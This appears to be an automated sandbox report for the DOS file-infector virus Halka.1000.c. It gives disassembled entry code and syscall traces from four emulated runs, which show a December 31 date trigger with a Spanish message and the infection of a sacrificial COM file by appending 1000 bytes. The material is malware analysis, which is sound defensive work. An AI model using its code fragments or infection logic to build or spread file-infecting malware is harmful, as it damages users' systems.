Sample viewer

vx.netlux.org/Virus.DOS.Halka.1000.c

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:12.150011321Z 42 PC: 13f3c | Get date
0x13f3c: cmp dh, 0xc
0x13f3f: jne 0x13f54
0x13f41: cmp dl, 0x1f
0x13f44: jne 0x13f54
0x13f46: mov ax, 0x900
0x13f49: lea dx, word ptr [bp + 0x166]
0x13f4d: int 0x21
0x13f4f: mov ax, 0x4c00
0x13f52: int 0x21
0x13f54: cld
0x13f55: mov cx, 4
0x13f58: mov di, 0x100
0x13f5b: lea si, word ptr [bp + 0x15c]
0x13f5f: rep movsb byte ptr es:[di], byte ptr [si]
0x13f61: mov ax, 0x4e00
0x13f64: mov cx, 0
0x13f67: lea dx, word ptr [bp + 0x160]
0x13f6b: int 0x21
0x13f6d: jae 0x13f81
0x13f6f: mov cx, 0x2b
2018-12-17T23:01:12.152935871Z 78 PC: 13f6d | Find first file
2018-12-17T23:01:12.160546163Z 61 PC: 13f89 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:12.167887849Z 63 PC: 13f98 | Read file or device (Read 4 bytes on handle 17)
2018-12-17T23:01:12.175028101Z 66 PC: 13fbd | Move file pointer
2018-12-17T23:01:12.182406507Z 64 PC: 13fca | Write file or device (Write 1 bytes on handle 17)
2018-12-17T23:01:12.185189704Z 64 PC: 13fe8 | Write file or device (Write 2 bytes on handle 17)
2018-12-17T23:01:12.188329364Z 64 PC: 13ff5 | Write file or device (Write 1 bytes on handle 17)
2018-12-17T23:01:12.192593459Z 66 PC: 14002 | Move file pointer
2018-12-17T23:01:12.194288109Z 64 PC: 14028 | Write file or device (Write 1000 bytes on handle 17)
2018-12-17T23:01:12.209766003Z 62 PC: 1402d | Close file
2018-12-17T23:01:12.220744283Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T23:01:12.225040809Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13785,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:58.706965346Z 42 PC: 13f3c | Get date
0x13f3c: cmp dh, 0xc
0x13f3f: jne 0x13f54
0x13f41: cmp dl, 0x1f
0x13f44: jne 0x13f54
0x13f46: mov ax, 0x900
0x13f49: lea dx, word ptr [bp + 0x166]
0x13f4d: int 0x21
0x13f4f: mov ax, 0x4c00
0x13f52: int 0x21
0x13f54: cld
0x13f55: mov cx, 4
0x13f58: mov di, 0x100
0x13f5b: lea si, word ptr [bp + 0x15c]
0x13f5f: rep movsb byte ptr es:[di], byte ptr [si]
0x13f61: mov ax, 0x4e00
0x13f64: mov cx, 0
0x13f67: lea dx, word ptr [bp + 0x160]
0x13f6b: int 0x21
0x13f6d: jae 0x13f81
0x13f6f: mov cx, 0x2b
2018-12-25T12:38:58.709627645Z 78 PC: 13f6d | Find first file
2018-12-25T12:38:58.716085092Z 61 PC: 13f89 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:58.723455937Z 63 PC: 13f98 | Read file or device (Read 4 bytes on handle 17)
2018-12-25T12:38:58.729997451Z 66 PC: 13fbd | Move file pointer
2018-12-25T12:38:58.739321054Z 64 PC: 13fca | Write file or device (Write 1 bytes on handle 17)
2018-12-25T12:38:58.741997943Z 64 PC: 13fe8 | Write file or device (Write 2 bytes on handle 17)
2018-12-25T12:38:58.744619385Z 64 PC: 13ff5 | Write file or device (Write 1 bytes on handle 17)
2018-12-25T12:38:58.747669061Z 66 PC: 14002 | Move file pointer
2018-12-25T12:38:58.749718575Z 64 PC: 14028 | Write file or device (Write 1000 bytes on handle 17)
2018-12-25T12:38:59.639182488Z 62 PC: 1402d | Close file
2018-12-25T12:38:59.808405241Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:38:59.812660778Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":31,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13785,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:58.830460761Z 42 PC: 13f3c | Get date
0x13f3c: cmp dh, 0xc
0x13f3f: jne 0x13f54
0x13f41: cmp dl, 0x1f
0x13f44: jne 0x13f54
0x13f46: mov ax, 0x900
0x13f49: lea dx, word ptr [bp + 0x166]
0x13f4d: int 0x21
0x13f4f: mov ax, 0x4c00
0x13f52: int 0x21
0x13f54: cld
0x13f55: mov cx, 4
0x13f58: mov di, 0x100
0x13f5b: lea si, word ptr [bp + 0x15c]
0x13f5f: rep movsb byte ptr es:[di], byte ptr [si]
0x13f61: mov ax, 0x4e00
0x13f64: mov cx, 0
0x13f67: lea dx, word ptr [bp + 0x160]
0x13f6b: int 0x21
0x13f6d: jae 0x13f81
0x13f6f: mov cx, 0x2b
2018-12-25T12:38:58.833257252Z 9 PC: 13f4f | Display string (String= ' Este es el virus 786 Version 1 Echo por --> ��x�� [�x�]/A.H.D. HALKA/. Industria Argentina Quemen al muñeco del `94! ')
2018-12-25T12:38:58.836807993Z 76 PC: 13f54 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13785,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:58.963248591Z 42 PC: 13f3c | Get date
0x13f3c: cmp dh, 0xc
0x13f3f: jne 0x13f54
0x13f41: cmp dl, 0x1f
0x13f44: jne 0x13f54
0x13f46: mov ax, 0x900
0x13f49: lea dx, word ptr [bp + 0x166]
0x13f4d: int 0x21
0x13f4f: mov ax, 0x4c00
0x13f52: int 0x21
0x13f54: cld
0x13f55: mov cx, 4
0x13f58: mov di, 0x100
0x13f5b: lea si, word ptr [bp + 0x15c]
0x13f5f: rep movsb byte ptr es:[di], byte ptr [si]
0x13f61: mov ax, 0x4e00
0x13f64: mov cx, 0
0x13f67: lea dx, word ptr [bp + 0x160]
0x13f6b: int 0x21
0x13f6d: jae 0x13f81
0x13f6f: mov cx, 0x2b
2018-12-25T12:38:58.966025178Z 78 PC: 13f6d | Find first file
2018-12-25T12:38:58.972656919Z 61 PC: 13f89 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:58.980480382Z 63 PC: 13f98 | Read file or device (Read 4 bytes on handle 17)
2018-12-25T12:38:58.987260262Z 66 PC: 13fbd | Move file pointer
2018-12-25T12:38:58.988749108Z 64 PC: 13fca | Write file or device (Write 1 bytes on handle 17)
2018-12-25T12:38:58.991518598Z 64 PC: 13fe8 | Write file or device (Write 2 bytes on handle 17)
2018-12-25T12:38:58.994228581Z 64 PC: 13ff5 | Write file or device (Write 1 bytes on handle 17)
2018-12-25T12:38:58.997452362Z 66 PC: 14002 | Move file pointer
2018-12-25T12:38:58.998898765Z 64 PC: 14028 | Write file or device (Write 1000 bytes on handle 17)
2018-12-25T12:39:00.124380182Z 62 PC: 1402d | Close file
2018-12-25T12:39:00.169553219Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:39:00.172624519Z 0 PC: 12a89 | Program terminate